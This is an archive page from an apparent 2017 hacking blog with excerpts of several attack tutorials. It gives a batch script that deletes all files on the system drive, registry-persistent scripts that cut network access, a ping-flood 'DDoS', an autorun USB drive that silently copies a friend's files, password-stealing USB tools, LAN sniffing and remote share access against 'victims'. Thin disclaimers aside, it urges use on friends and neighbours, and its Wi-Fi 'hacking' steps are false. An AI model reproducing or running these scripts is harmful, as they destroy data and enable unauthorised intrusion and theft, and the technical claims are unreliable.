Posts

Showing posts from December, 2017

VIRUS WRITING

Image
IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept. All Scripts Here Are To Be Copied In Note Pad >>This Virus Deletes All The Content Of A Drive… @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Save The Above Code in a .bat file ______________________________________  >>Disable Internet Permanently Save As A bat File echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE _____________________________________________  >>T...

How To Capture Passwords Using USB Drive

Note: This tutorial is only for educational purpose and do this at your own risk. We don’t provide the links of the tools you can Google them and get an updated version of it. Today I will show you how to capture Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pen drive you can create your own root kit to capture passwords from your friend’s/college Computer. We need the following tools to create our root kit: MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messeng...

Some of Most Dangerous .bat Files

Image
IMPORTANT NOTE:   SOME OF THESE CODES ARE VERY DANGEROUS YESTEE IS NOT RESPONSIBLE FOR ANY OTHER CAUSE USE THIS CODES AT YOUR OWN RISK Block Google. Code: @echo off ::--------Block Google-------:: cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 google.com >> "Hosts" echo 127.0.0.1 http://www.google.com >> "Hosts" ::---------------------------:: Block Hotmail. Code: @echo off ::--------Block Hotmail------:: cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 hotmail.com >> "Hosts" echo 127.0.0.1 http://www.hotmail.com >> "Hosts" ::---------------------------:: Block MSN. Code: @echo off ::---------Block MSN---------:: cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 msn.com >> "Hosts" echo 127.0.0.1 http://www.msn.com >> "Hosts" ::---------------------------:: Block wikipedia. Code: ...

How to Attack DDos Attack on Websites Using CMD

Image
DDos is defined as “Distributed Denail of Service Attack“. This tutorial explains what is DDosing and how to hack a website temporarily using DDos method. It is a very common news when you hear that a website is hacked by a group or a website is crashed and etc. etc. Have you ever wonder how a hacker group take a website down or do you know the exact method of crashing a website? Actually there are several methods which are used by the hacker group. However, using Distributed Denail of Service Attack technology, any small website can be crashed very easily. HOW TO DDOS A WEBSITE MANUALLY USING WINDOWS COMMAND PROMPT : STEP1: Select a small website that you want to DDos attack. STEP2: Find the IP address of the website. To find the IP address of a specific website just use the following command: ping www.example.com -t The IP address looks similar to xxx.xxx.xxx.xxx STEP3: Now type the following command: ping [ip address] -t -l 65500 STEP4: Run the co...

How To Hack WiFi Passwords Using CMD

Hacking a Wi-Fi device is not always easy. You have to be careful of so many steps. Otherwise, you might even get caught. For easy and secure hacking, one should use the command prompt (cmd). Cmd is one of the most used features of Windows that gives you access to almost everything on a system. If used properly, you can even get inside other remote systems. STEPS TO HACK WIFI PASSWORDS USING CMD: STEP1: Open command prompt by going to start and click on run command or enter windows+r, then type cmd and hit Enter STEP2: In command prompt window, type   netsh wlan show network mode=bssid STEP3: This command will show all the available WiFi network in your area STEP4:   This is the last step. Just type: NETSH WLAN CONNECT NAME = (WiFi NAME) netsh wlan connect name=Mynet Sata1 and you will be connected to that WiFi network. STEP5: To disconnect it, type   netsh wlan disconnect

Hack WiFi Passwords Using CMD

You can experiment these trick with your neighbors or friends. It’s not necessarily that this trick will work with every wifi because of upgraded hardware. But you can still try this crack with wifi having old modems or routers. 1: WEP: Wired Equivalent Privacy (WEP) is one of the widely used security key in wifi devices. It is also the oldest and most popular key and was added in 1999. WEP uses 128 bit and 256-bit encryption. With the help of this tutorial, you can easily get into 128-bit encryption and Hack WiFi password using CMD. 2: WAP and WAP2: Wi-Fi Protected Access is an another version of WiFi encryption and was first used in 2003. It uses the 256-bit encryption model and is tough to hack. WAP2 is an updated version of WAP and was introduced in 2006. Since then it has replaced WAP and is now been used mostly in offices and colleges worldwide. Below are some steps to hack wifi password using cmd. Follow them carefully and you might get one of your neighbo...

Hack Some Other Computer Remotely Using Their IP Address

Image
hello guys,now i am going to guide you how to access the victim system remotely using the IP address. Step 1: Now Go to Start and click Run and then type as “CMD” and hit enter. command prompt will open. Step 2: Type in cmd as “nbtstat -a IPaddressOfVictim”  and hit enter. (use ping command to know victim ipaddress) For eg: nbstat -a 223.222.222.222 If you see this your in NetBIOS Remote Machine Name Table Name Type Status ————————————————————— user<00> UNIQUE Registered workgroup <00> GROUP Registered user <03> UNIQUE Registered user <20> UNIQUE Registered MAC Address = xx-xx-xx-xx-xx-xx ————————————————————— If you don’t get the number <20>. The victim disabled the File And Printer Sharing, find  another victim.  Step 3: Now type as  “net use x: \IPaddressOfVictimCDISK” and hit enter> replace with ip address of vitim in the place of  “IPaddressOfVictim. ...

How To Copy (Steal) Files From a Computer to a Pen-drive

hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc.here i come with cool tricks just plug your USB Flash drive into his PC to automatically copy his files to your pen drive, secretly and silently. Copy the files you brought to his PC to complete the act. Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive. STEP 1 Open Notepad (I recommend Notepad++) and copy-paste the following lines. [autorun] icon=drive.ico open=launch.bat action=Click OK to Run shell\open\command=launch.bat Save this as autorun.inf The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something. The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what y...

How To Hack Sniffing Passwords From Same Network (LAN) Using Cain And Abel Tool

Image
Hello guys today i am going to tell you about how to hack victim password  if he is connected on same network. Here I will show you that how simple HTTP and FTP passwords can be sniffed across LAN network. Just follow the steps and you are done. First install the tool Cain And Able form  here. About the tool Cain And Abel: Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol’s standards, authentication methods and c...